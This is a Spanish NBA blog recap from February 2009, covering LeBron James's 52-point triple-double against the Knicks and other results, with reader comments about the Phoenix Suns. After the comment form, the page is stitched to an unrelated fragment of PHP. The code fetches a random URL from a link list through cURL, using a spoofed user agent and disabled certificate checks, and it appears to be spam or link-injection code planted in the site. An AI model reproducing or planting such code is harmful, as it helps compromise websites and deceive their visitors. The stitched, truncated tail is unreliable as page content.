La Crónica (04/02/2009)

05 de February de 2009 por txusma

Ayer agotamos muchos de los elogios que “King” James se merece pero para el día de hoy tendremos que inventar más. Dos días después de que Kobe asombrara al Madison con 61 puntos, un LeBron hipermotivado se iba a los 52 adornados además con 11 asistencias y 10 rebotes. De esta manera, el alero de los Cavs conseguía el vigésimoprimer triple doble de su carrera y se convertía, junto con Michael Jordan, en el único jugador visitante capaz de anotar más de 50 puntos en el Madison en, al menos, 2 ocasiones. Por si esto fuera poco nadie realizaba un triple-doble anotando más de 50 puntos desde 1975 (lo hizo Kareem Abdul-Jabbar). Nadie. A sus 24 años, LeBron sigue destrozando récord tras récord. Más de un fan local vendería ahora mismo su alma al diablo por tenerlo en su equipo.

Está claro que el rápido y poco defensivo sistema de juego de los actuales Knicks beneficia esta clase de exhibiciones pero también es cierto que es un modo de juego que les está dando buenos resultados. Ayer pusieron en más apuros de los previstos a los Cavs y tan sólo la calidad de los secundarios de LeBron (los Ilgauskas, Williams, Szczerbiak…) decantaron finalmente la balanza.

Lakers y Magic, por su parte, solventaron con mayor o menor facilidad sus respectivos enfrentamientos. Los amarillos se deshicieron de los Raptors con unos geniales Pau Gasol y Kobe Bryant, que ante la baja de Andrew Bynum no han tardado ni un partido en subir sus prestaciones. En Toronto, de nuevo faltó Calderón y de nuevo el equipo lo notó en demasía. La falta de un base suplente en condiciones se ha convertido en una lacra excesivamente pesada. Por su parte, Orlando, jugando a medio gas, se merendó a unos Clippers que empiezan a recuperar a sus figuras pero que no despega. Posiblemente ya piensen más en el número 1 del draft que en cualquier otra cosa.

Los dos partidos más interesantes a priori de la jornada conocieron las victorias de Detroit y Dallas. Los primeros rompieron una racha de 4 derrotas en casa frente a los Heat en un partido que se mantuvo igualado en todo momento. Finalmente, los Pistons se hicieron con una trabajadísima victoria a pesar de su desatino con los tiros libres en los últimos segundos. Y los Mavs vencieron a Portland con un Terry que entra de lleno en cualquier apuesta por el mejor 6º hombre. En los Blazers Sergio está gastando sus últimas balas y cada día Bayless le tiene más comido el sitio.

En el resto de la jornada, Denver se llevó un partido que-ni-se-lo-creen en Oklahoma, los Hornets acusaron la baja de Paul ante los Bulls a pesar de los esfuerzos de Stojakovic y West, los Nets destrozaron a unos Wizards sin Butler, Atlanta a Minnesotta, Memphis dio la sorpresa ante los Rockets y los Warriors ganaron a los Suns en una noche en que se escenificó un nuevo capítulo en la particular carrera de despropósitos de Phoenix.  Se debería empezar a analizar qué ha aportado Porter a este equipo.

PREMIOS:

MVP: Lebron James. ¿Hace falta algún dato que no hayamos dado ya?

Rookie: Grandes partidos de los dos máximos favoritos al Rookie del año. Derrick Rose (21 puntos y 6 asistencias) y OJ Mayo (32 puntos) pelearán hasta el último día.

La sorpresa: Posiblemente cuando Colangelo se hizo con los servicios de Jermaine O’Neal soñaba con muchas noches como la de hoy. 22 puntos, 9 rebotes, 4 asistencias, 0 pérdidas y 9 tapones. Si jugara todo el año así a lo mejor otro gallo cantaría para los Raptors.

La decepción: Dicen que Monta Ellis ha vuelto pero aún se le ve lejos de su mejor forma. Ayer, 0 de 7 en tiros. Se podría juntar con Telfair y su 0 de 9 e irse a hacer unos 2 contra 2.

El mayor esfuerzo en vano: El ya mencionado de Jermaine o, sobretodo, los 39 puntos y 13 rebotes de Al Harrington que tuvo la mala suerte de jugar contra un extraterrestre.

RAZONES PARA TRASNOCHAR

Esta madrugada del jueves al viernes se disputan tres partidos. Pero no necesitamos más que uno de ellos para encontrar todas las razones del mundo para trasnochar:rivalry

Lakers @ Celtics. ¿Recuerdan lo que sucedió en la última visita de los Lakers a Boston? Lo que sucedió fue la segunda mayor diferencia en un marcador en la historia de las Finales; una humillación para los angelinos en el partido que dio el Anillo a los Celtics. Por un lado, los Lakers llegan con ansias de vengar aquello. Por el otro, los Celtics afrontan el partido con la necesidad de vencer y poner en evidencia, como ya hicieran en las Finales, que los Lakers sin Bynum no son lo mismo. Kobe y Pau se resisten a creerlo y entre los dos suman en los dos últimos partidos, atención, 159 puntos. Los Celtics suman doce victorias seguidas. Los Lakers, cuatro. Esta noche, a partir de las 2 de la madrugada, Lakers vs Celtics, como en los viejos tiempos.

La pregunta del día: La hemos formulado una poco más arriba ¿Qué ha aportado Porter a los Suns?

Comenta

9 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Oye ¿no hay alguna ley que prohíba hacer lo de LeBron? Animalico… Por cierto, fue graciosa la última jugada del partido. LeBron llevaba 9 rebotes y el partido estaba decidido (5 arriba para Cavs). Pero Chris Duhon lanzó un triple y LeBron fue como una bestia a coger el rebote para completar el triple doble.

    Sobre la pregunta, pues mira, Shaq ha mejorado mucho. Y… mmm… esto… sí, Shaq ha mejorado.

    Tremendo partido el de esta noche. Let’s Go Lakers!! Y el domingo a las 21:30 horas, espectacular Lakers vs Cavs.

    PD: Me da que nos cae otra paliza esta noche, juas juas.

      Citar

  2. Viva_Dirk dice:
    #2

    La pregunta habrá que contestarla en play-offs, pero creo que todos dijimos que Phoenix mejoraba con la llegada de Richardson, es normal que le halla costado acoplarse, pero un enfrentamiento a 7 partidos con Shaq y Nash sanos no creo que sea poca cosa.

      Citar

  3. MagicJohnson32 dice:
    #3

    ¿En Playoffs? Pues que no se descuiden, porque están octavos, casi empatados con los Jazz que son novenos. Tienen la suerte de que los Jazz acumulan lesión tras lesión, que si no…

      Citar

  4. TheDeerHunter dice:
    #4

    Hombre de poca fe, Magic… >S

    Sobre la pregunta… la intención de Porter desde el principio era bajar el ritmo de juego para beneficiar sus hombres grandes, el control del partido y la defensa.

    Lo de los hombres grandes es discutible… pues sólo parece haber beneficiado a Shaq y no especialmente a Stoudemire. Eso sí… a costa de echar a perder al mejor jugador de Phoenix en los últimos tiempos. Nash.
    Del control del partido y de la defensa mejor ni hablamos.

    Además de todo… el fichaje de Jason Richardson de momento les ha salido rana.

    PD: Monta Ellis dimissió…

      Citar

  5. Hynreck dice:
    #5

    Lo de LeBron es una bestialidad, el morlaco éste abusa, y mira que me jode porque no me gusta nada…

    Por cierto, otro Buzzer-beater de Melo, y van…

      Citar

  6. Txusma dice:
    #6

    En otro blog lei ayer (http://estadisticasybikinis.blogspot.com/. Muy bueno por cierto) algo sobre este tema y su conclusion creo es totalmente valida. Si quieres cambiar el estilo de juego hazlo del todo pero no te quedes con un base al q sabes no beneficia el nuevo estilo q quieres imponer. Y si encima quieres defender, ¿pq traspasas a tu mejor defensor exterior (Bell) y a Diaw a cambio de Richardson?

      Citar

  7. underlock dice:
    #7

    Partidazo esta noche, espero que los Lakers den un golpe de autoridad en la liga y consigan una victoria clave, de todas maneras los Celtics son favoritos. ¿Sigue de baja Garnett, o reaparecerá esta noche?

    Lo de los Suns es el problema de muchas franquicias, no tienen banquillo. Sólo Barbosa como sexto hombre, lo demas…. Y no tienen un base suplente de garantias para descargar de minutos a Nash.

      Citar

  8. Llukas 70 dice:
    #8

    Lo de los Suns es algo extraño. No pudieron ganar el anillo cuando tenian que hacerlo y ahora luchan para estar en playoofs. Sinceramente al inicio de este año no creia que los Suns llegaran muy lejos pero si que esperaba que Amare diera por fin el salto de calidad que todos queriamos, pero es que no lo ha dado!!
    Stoudemire no deja de ser un buen anotador y reboteador, con un buen tiro,pero que podria ser muchisimo mas, Nash continua siendo un gran base que va esperando su retirada guiando a este equipo sin rumbo, Richardon: un gran fichaje que ha hecho mejorar apenas el grupo, Grant Hill que al igual que Nash o O’neal intenta acabar de una manera digna sus ultimos años como jugador, en el banquillo solo destaca Barbosa y NADA MAS.

    Sinceramente la unica alegria de este año para phoenix es ni mas ni menos que el rejuvenecido Shaquille. Shaq llego a Phoenix despues de acabar muy mal en Miami, pero ahora esta haciendo unos numeros que ni el mismo Terry Porter habria podido imaginar. Lo que no sabemos muy bien es que mision es la de Shaq en Phoenix, ni si esta favoreciendo al equipo con su juego o lo esta empeorando todo.

      Citar

  9. MagicJohnson32 dice:
    #9

    Sí, Underlock, olvidé decir en la crónica que todo apunta a que KG jugará. Fue baja los dos partidos anteriores por gripe pero el de esta noche no se lo pierde ni a tiros.

    El caso de los Suns es curioso. Diría que todo empezó (con todo me refiero a este acelerado proceso de descomposición) cuando Marion empezó a quejarse y dijo que se quería marchar ¿no? Entonces vimos que el vestuario estaba mal y las cosas empezaron a ir de mal en peor; luego llegó el traspaso de Shaq, luego se fue D’Antoni… y la crisis de identidad en la que se encuentran es profundísima.

    Aunque ahora que lo pienso, es posible que todo empezase cuando se fue Colangelo…

    Y Amare, con todo lo bueno que es, siempre me ha parecido un ‘hacedor de números’ de primera.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>